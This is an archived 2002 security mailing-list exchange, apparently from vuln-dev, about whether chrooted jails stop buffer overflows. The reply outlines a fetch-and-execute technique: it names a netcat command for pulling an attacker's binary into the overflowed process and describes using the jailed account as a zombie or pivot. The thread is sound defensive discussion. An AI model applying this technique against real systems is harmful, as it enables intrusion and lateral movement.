Sure it can. Just have the bootstrap code (the overflow) download a binary from the attacker's machine: 'nc victim_machine portnum < evilcode' Then exec the code. All the calls you need are in libc, which is almost certainly loaded by the overflowed program. You have a chrooted, local account that can still be used as a zombie for attacks or masking your true location... (Or as a stepping stone for attacking more powerful accounts / machines on the local network) Adam >From: Jason Haar <Jason.Haarat_private> >To: vuln-devat_private >Subject: OT? Are chroots immune to buffer overflows? >Date: Wed, 22 May 2002 15:48:16 +1200 > >[note: my question is WRT non-root chrooted jails - we all know about >chroot'ing root processes!] > >Most buffer overflows I've seen attempt to infiltrate the system enough to >run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist >- >so they fail. > >Is it as simple as that? As 99.999% of the system binaries aren't available >in the jail, can a buffer overflow ever work? > >-- >Cheers > >Jason Haar > >Information Security Manager >Trimble Navigation Ltd. >Phone: +64 3 9635 377 Fax: +64 3 9635 417 _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com
This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:58:15 PDT